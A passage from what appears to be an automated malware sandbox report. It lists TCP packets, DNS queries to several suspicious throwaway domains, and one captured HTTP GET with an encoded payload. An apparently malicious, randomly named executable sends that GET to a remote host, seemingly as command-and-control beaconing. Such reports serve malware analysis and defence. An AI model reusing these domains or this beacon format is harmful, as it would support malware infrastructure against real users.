                                                                                          Sep 30, 2024 18:45:33.273912907 CEST804972631.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:33.928003073 CEST804972631.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:33.928025007 CEST804972631.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:33.928190947 CEST4972680192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:34.789660931 CEST4972680192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:35.802697897 CEST4972780192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:35.807728052 CEST804972731.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:35.809099913 CEST4972780192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:35.819681883 CEST4972780192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:35.824665070 CEST804972731.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:35.824795008 CEST804972731.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:36.499644041 CEST804972731.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:36.499842882 CEST804972731.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:36.499996901 CEST4972780192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:37.330575943 CEST4972780192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:38.352478981 CEST4972880192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:38.358123064 CEST804972831.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:38.360121965 CEST4972880192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:38.367938042 CEST4972880192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:38.374247074 CEST804972831.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:39.050970078 CEST804972831.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:39.050993919 CEST804972831.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:39.051167965 CEST4972880192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:39.054281950 CEST4972880192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:39.060642004 CEST804972831.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:44.340513945 CEST4972980192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:44.345390081 CEST80497293.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:44.345523119 CEST4972980192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:44.357346058 CEST4972980192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:44.362211943 CEST80497293.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:44.803666115 CEST80497293.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:44.803733110 CEST4972980192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:45.862255096 CEST4972980192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:45.867284060 CEST80497293.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:46.880894899 CEST4973080192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:46.885817051 CEST80497303.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:46.885911942 CEST4973080192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:46.897329092 CEST4973080192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:46.902223110 CEST80497303.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:47.604343891 CEST80497303.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:47.605004072 CEST80497303.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:47.605021954 CEST4973080192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:47.610028028 CEST4973080192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:48.413942099 CEST4973080192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:48.419111013 CEST80497303.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:49.428239107 CEST4973180192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:49.433222055 CEST80497313.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:49.433295965 CEST4973180192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:49.449060917 CEST4973180192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:49.453958035 CEST80497313.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:49.454037905 CEST80497313.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:49.889275074 CEST80497313.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:49.890045881 CEST4973180192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:50.955575943 CEST4973180192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:50.960545063 CEST80497313.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:51.977936983 CEST4973280192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:51.984338045 CEST80497323.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:51.989964008 CEST4973280192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:51.993941069 CEST4973280192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:51.999953032 CEST80497323.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:52.447935104 CEST80497323.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:52.448338985 CEST80497323.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:52.448503971 CEST4973280192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:52.452944994 CEST4973280192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:52.459444046 CEST80497323.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:57.472338915 CEST4973380192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:57.477210999 CEST80497333.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:57.477332115 CEST4973380192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:57.488435030 CEST4973380192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:57.493341923 CEST80497333.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:57.942615032 CEST80497333.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:57.946439981 CEST4973380192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:59.002850056 CEST4973380192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:59.010484934 CEST80497333.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:00.021003962 CEST4973480192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:00.026226044 CEST80497343.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:00.030210972 CEST4973480192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:00.042021990 CEST4973480192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:00.046921968 CEST80497343.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:00.490369081 CEST80497343.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:00.491065025 CEST4973480192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:01.566272974 CEST4973480192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:01.573678970 CEST80497343.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:02.585936069 CEST4973580192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:02.592982054 CEST80497353.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:02.593102932 CEST4973580192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:02.604048967 CEST4973580192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:02.609000921 CEST80497353.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:02.609019995 CEST80497353.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:03.052462101 CEST80497353.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:03.052545071 CEST4973580192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:04.166642904 CEST4973580192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:04.172540903 CEST80497353.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:05.178265095 CEST4973680192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:05.244272947 CEST80497363.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:05.244352102 CEST4973680192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:05.251880884 CEST4973680192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:05.257360935 CEST80497363.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:06.630744934 CEST80497363.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:06.630825996 CEST80497363.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:06.630904913 CEST4973680192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:06.633805037 CEST4973680192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:06.638597965 CEST80497363.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:12.228687048 CEST4973780192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:12.233620882 CEST8049737199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:12.233736038 CEST4973780192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:12.244235992 CEST4973780192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:12.249160051 CEST8049737199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:12.839900970 CEST8049737199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:12.839963913 CEST8049737199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:12.840051889 CEST4973780192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:13.752969027 CEST4973780192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:14.771316051 CEST4973880192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:14.910134077 CEST8049738199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:14.910233974 CEST4973880192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:14.922312975 CEST4973880192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:14.927541971 CEST8049738199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:15.509844065 CEST8049738199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:15.509900093 CEST8049738199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:15.509965897 CEST4973880192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:16.425971031 CEST4973880192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:17.444201946 CEST4973980192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:17.449861050 CEST8049739199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:17.449938059 CEST4973980192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:17.465114117 CEST4973980192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:17.470196962 CEST8049739199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:17.470319986 CEST8049739199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:18.148269892 CEST8049739199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:18.148330927 CEST8049739199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:18.150197029 CEST4973980192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:18.971477032 CEST4973980192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:19.990300894 CEST4974080192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:19.995717049 CEST8049740199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:19.998102903 CEST4974080192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:20.004842043 CEST4974080192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:20.010301113 CEST8049740199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:20.598527908 CEST8049740199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:20.598581076 CEST8049740199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:20.598814011 CEST4974080192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:20.601948977 CEST4974080192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:20.606801033 CEST8049740199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:25.657496929 CEST4974180192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:25.662563086 CEST80497413.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:25.662638903 CEST4974180192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:25.713385105 CEST4974180192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:25.718386889 CEST80497413.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:26.311675072 CEST80497413.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:26.314021111 CEST4974180192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:27.221226931 CEST4974180192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:27.226202965 CEST80497413.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:28.344153881 CEST4974280192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:28.349153042 CEST80497423.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:28.349239111 CEST4974280192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:28.368000984 CEST4974280192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:28.375370979 CEST80497423.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:29.737200975 CEST80497423.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:29.738123894 CEST4974280192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:29.877942085 CEST4974280192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:29.882842064 CEST80497423.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:30.945161104 CEST4974380192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:31.445936918 CEST80497433.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:31.446026087 CEST4974380192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:31.459141970 CEST4974380192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:31.464020014 CEST80497433.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:31.464242935 CEST80497433.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:31.920974016 CEST80497433.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:31.922116041 CEST4974380192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:32.971259117 CEST4974380192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:32.976421118 CEST80497433.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:34.009954929 CEST4974480192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:34.014890909 CEST80497443.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:34.016103983 CEST4974480192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:34.023124933 CEST4974480192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:34.028105021 CEST80497443.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:34.481323957 CEST80497443.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:34.481354952 CEST80497443.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:34.481837034 CEST4974480192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:34.484368086 CEST4974480192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:34.489880085 CEST80497443.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:39.510593891 CEST4974580192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:46:39.515628099 CEST8049745188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:46:39.515700102 CEST4974580192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:46:39.529092073 CEST4974580192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:46:39.534900904 CEST8049745188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:46:40.039232969 CEST8049745188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:46:40.040517092 CEST8049745188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:46:40.040590048 CEST4974580192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:46:41.033628941 CEST4974580192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:46:42.053970098 CEST4974680192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:46:42.059146881 CEST8049746188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:46:42.059431076 CEST4974680192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:46:42.069973946 CEST4974680192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:46:42.074873924 CEST8049746188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:46:42.538909912 CEST8049746188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:46:42.540323019 CEST8049746188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:46:42.546070099 CEST4974680192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:46:43.581784964 CEST4974680192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:46:44.599180937 CEST4974780192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:46:44.604350090 CEST8049747188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:46:44.604600906 CEST4974780192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:46:44.614772081 CEST4974780192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:46:44.619895935 CEST8049747188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:46:44.619908094 CEST8049747188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:46:45.068811893 CEST8049747188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:46:45.069700956 CEST8049747188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:46:45.069786072 CEST4974780192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:46:46.127399921 CEST4974780192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:46:47.174294949 CEST4974880192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:46:47.179524899 CEST8049748188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:46:47.179590940 CEST4974880192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:46:47.186758995 CEST4974880192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:46:47.192430973 CEST8049748188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:46:47.677134037 CEST8049748188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:46:47.677592993 CEST8049748188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:46:47.677650928 CEST4974880192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:46:47.681945086 CEST4974880192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:46:47.686954975 CEST8049748188.114.96.3192.168.2.5

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Sep 30, 2024 18:44:30.263058901 CEST5162253192.168.2.51.1.1.1
                                                                                          Sep 30, 2024 18:44:30.568319082 CEST53516221.1.1.1192.168.2.5
                                                                                          Sep 30, 2024 18:44:46.333885908 CEST6273853192.168.2.51.1.1.1
                                                                                          Sep 30, 2024 18:44:46.347861052 CEST53627381.1.1.1192.168.2.5
                                                                                          Sep 30, 2024 18:44:59.490360975 CEST5475053192.168.2.51.1.1.1
                                                                                          Sep 30, 2024 18:44:59.504785061 CEST53547501.1.1.1192.168.2.5
                                                                                          Sep 30, 2024 18:45:13.271548986 CEST5514553192.168.2.51.1.1.1
                                                                                          Sep 30, 2024 18:45:13.989140987 CEST53551451.1.1.1192.168.2.5
                                                                                          Sep 30, 2024 18:45:29.990216970 CEST6520953192.168.2.51.1.1.1
                                                                                          Sep 30, 2024 18:45:30.088645935 CEST53652091.1.1.1192.168.2.5
                                                                                          Sep 30, 2024 18:45:44.181812048 CEST5903753192.168.2.51.1.1.1
                                                                                          Sep 30, 2024 18:45:44.335098028 CEST53590371.1.1.1192.168.2.5
                                                                                          Sep 30, 2024 18:45:57.459255934 CEST6418153192.168.2.51.1.1.1
                                                                                          Sep 30, 2024 18:45:57.469362974 CEST53641811.1.1.1192.168.2.5
                                                                                          Sep 30, 2024 18:46:11.650046110 CEST5043653192.168.2.51.1.1.1
                                                                                          Sep 30, 2024 18:46:12.226269960 CEST53504361.1.1.1192.168.2.5
                                                                                          Sep 30, 2024 18:46:25.622725010 CEST5455453192.168.2.51.1.1.1
                                                                                          Sep 30, 2024 18:46:25.651401997 CEST53545541.1.1.1192.168.2.5
                                                                                          Sep 30, 2024 18:46:39.492805004 CEST6539753192.168.2.51.1.1.1
                                                                                          Sep 30, 2024 18:46:39.507623911 CEST53653971.1.1.1192.168.2.5
                                                                                          Sep 30, 2024 18:46:53.115156889 CEST6083353192.168.2.51.1.1.1
                                                                                          Sep 30, 2024 18:46:53.167988062 CEST53608331.1.1.1192.168.2.5

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Sep 30, 2024 18:44:30.263058901 CEST192.168.2.51.1.1.10x743Standard query (0)www.dxeg.lolA (IP address)IN (0x0001)false
                                                                                          Sep 30, 2024 18:44:46.333885908 CEST192.168.2.51.1.1.10x6487Standard query (0)www.bqberw.vipA (IP address)IN (0x0001)false
                                                                                          Sep 30, 2024 18:44:59.490360975 CEST192.168.2.51.1.1.10x71cbStandard query (0)www.weatherbook.liveA (IP address)IN (0x0001)false
                                                                                          Sep 30, 2024 18:45:13.271548986 CEST192.168.2.51.1.1.10x1e98Standard query (0)www.cc101.proA (IP address)IN (0x0001)false
                                                                                          Sep 30, 2024 18:45:29.990216970 CEST192.168.2.51.1.1.10x65b3Standard query (0)www.dverkom.storeA (IP address)IN (0x0001)false
                                                                                          Sep 30, 2024 18:45:44.181812048 CEST192.168.2.51.1.1.10xe31cStandard query (0)www.crowsecurity.cloudA (IP address)IN (0x0001)false
                                                                                          Sep 30, 2024 18:45:57.459255934 CEST192.168.2.51.1.1.10x4582Standard query (0)www.multileveltravel.worldA (IP address)IN (0x0001)false
                                                                                          Sep 30, 2024 18:46:11.650046110 CEST192.168.2.51.1.1.10xe517Standard query (0)www.technectar.topA (IP address)IN (0x0001)false
                                                                                          Sep 30, 2024 18:46:25.622725010 CEST192.168.2.51.1.1.10xb271Standard query (0)www.linkwave.cloudA (IP address)IN (0x0001)false
                                                                                          Sep 30, 2024 18:46:39.492805004 CEST192.168.2.51.1.1.10x7ee7Standard query (0)www.bayarcepat19.clickA (IP address)IN (0x0001)false
                                                                                          Sep 30, 2024 18:46:53.115156889 CEST192.168.2.51.1.1.10x4c27Standard query (0)www.queima.shopA (IP address)IN (0x0001)false

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Sep 30, 2024 18:44:30.568319082 CEST1.1.1.1192.168.2.50x743No error (0)www.dxeg.lola22.dxzz.topCNAME (Canonical name)IN (0x0001)false
                                                                                          Sep 30, 2024 18:44:30.568319082 CEST1.1.1.1192.168.2.50x743No error (0)a22.dxzz.topdxzz.topCNAME (Canonical name)IN (0x0001)false
                                                                                          Sep 30, 2024 18:44:30.568319082 CEST1.1.1.1192.168.2.50x743No error (0)dxzz.top137.175.33.56A (IP address)IN (0x0001)false
                                                                                          Sep 30, 2024 18:44:46.347861052 CEST1.1.1.1192.168.2.50x6487No error (0)www.bqberw.vipbqberw.vipCNAME (Canonical name)IN (0x0001)false
                                                                                          Sep 30, 2024 18:44:46.347861052 CEST1.1.1.1192.168.2.50x6487No error (0)bqberw.vip3.33.130.190A (IP address)IN (0x0001)false
                                                                                          Sep 30, 2024 18:44:46.347861052 CEST1.1.1.1192.168.2.50x6487No error (0)bqberw.vip15.197.148.33A (IP address)IN (0x0001)false
                                                                                          Sep 30, 2024 18:44:59.504785061 CEST1.1.1.1192.168.2.50x71cbNo error (0)www.weatherbook.liveweatherbook.liveCNAME (Canonical name)IN (0x0001)false
                                                                                          Sep 30, 2024 18:44:59.504785061 CEST1.1.1.1192.168.2.50x71cbNo error (0)weatherbook.live3.33.130.190A (IP address)IN (0x0001)false
                                                                                          Sep 30, 2024 18:44:59.504785061 CEST1.1.1.1192.168.2.50x71cbNo error (0)weatherbook.live15.197.148.33A (IP address)IN (0x0001)false
                                                                                          Sep 30, 2024 18:45:13.989140987 CEST1.1.1.1192.168.2.50x1e98No error (0)www.cc101.pro188.114.96.3A (IP address)IN (0x0001)false
                                                                                          Sep 30, 2024 18:45:13.989140987 CEST1.1.1.1192.168.2.50x1e98No error (0)www.cc101.pro188.114.97.3A (IP address)IN (0x0001)false
                                                                                          Sep 30, 2024 18:45:30.088645935 CEST1.1.1.1192.168.2.50x65b3No error (0)www.dverkom.store31.31.196.17A (IP address)IN (0x0001)false
                                                                                          Sep 30, 2024 18:45:44.335098028 CEST1.1.1.1192.168.2.50xe31cNo error (0)www.crowsecurity.cloudcrowsecurity.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                          Sep 30, 2024 18:45:44.335098028 CEST1.1.1.1192.168.2.50xe31cNo error (0)crowsecurity.cloud3.33.130.190A (IP address)IN (0x0001)false
                                                                                          Sep 30, 2024 18:45:44.335098028 CEST1.1.1.1192.168.2.50xe31cNo error (0)crowsecurity.cloud15.197.148.33A (IP address)IN (0x0001)false
                                                                                          Sep 30, 2024 18:45:57.469362974 CEST1.1.1.1192.168.2.50x4582No error (0)www.multileveltravel.worldmultileveltravel.worldCNAME (Canonical name)IN (0x0001)false
                                                                                          Sep 30, 2024 18:45:57.469362974 CEST1.1.1.1192.168.2.50x4582No error (0)multileveltravel.world3.33.130.190A (IP address)IN (0x0001)false
                                                                                          Sep 30, 2024 18:45:57.469362974 CEST1.1.1.1192.168.2.50x4582No error (0)multileveltravel.world15.197.148.33A (IP address)IN (0x0001)false
                                                                                          Sep 30, 2024 18:46:12.226269960 CEST1.1.1.1192.168.2.50xe517No error (0)www.technectar.top199.192.21.169A (IP address)IN (0x0001)false
                                                                                          Sep 30, 2024 18:46:25.651401997 CEST1.1.1.1192.168.2.50xb271No error (0)www.linkwave.cloudlinkwave.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                          Sep 30, 2024 18:46:25.651401997 CEST1.1.1.1192.168.2.50xb271No error (0)linkwave.cloud3.33.130.190A (IP address)IN (0x0001)false
                                                                                          Sep 30, 2024 18:46:25.651401997 CEST1.1.1.1192.168.2.50xb271No error (0)linkwave.cloud15.197.148.33A (IP address)IN (0x0001)false
                                                                                          Sep 30, 2024 18:46:39.507623911 CEST1.1.1.1192.168.2.50x7ee7No error (0)www.bayarcepat19.click188.114.96.3A (IP address)IN (0x0001)false
                                                                                          Sep 30, 2024 18:46:39.507623911 CEST1.1.1.1192.168.2.50x7ee7No error (0)www.bayarcepat19.click188.114.97.3A (IP address)IN (0x0001)false
                                                                                          Sep 30, 2024 18:46:53.167988062 CEST1.1.1.1192.168.2.50x4c27No error (0)www.queima.shopqueima.shopCNAME (Canonical name)IN (0x0001)false
                                                                                          Sep 30, 2024 18:46:53.167988062 CEST1.1.1.1192.168.2.50x4c27No error (0)queima.shop84.32.84.32A (IP address)IN (0x0001)false

                                                                                          HTTP Request Dependency Graph

                                                                                          • www.dxeg.lol
                                                                                          • www.bqberw.vip
                                                                                          • www.weatherbook.live
                                                                                          • www.cc101.pro
                                                                                          • www.dverkom.store
                                                                                          • www.crowsecurity.cloud
                                                                                          • www.multileveltravel.world
                                                                                          • www.technectar.top
                                                                                          • www.linkwave.cloud
                                                                                          • www.bayarcepat19.click

                                                                                          HTTP Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.549711137.175.33.56801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:44:30.590893984 CEST539OUTGET /mxqs/?gHCXmDU=rHSAWCOTv0B2OyWbYMKwkuU+0pm+dYnzeuWywUFjfL0Y5nHDImWR+DkgzCKA2Uf76rKFoLo4oU5TM+FaPt+JwQr3UHywKVmmcKRjYyDIvIOI0clKCIXncFUG+d5lZOlczw==&Gh9=g8u8 HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Host: www.dxeg.lol
                                                                                          Connection: close
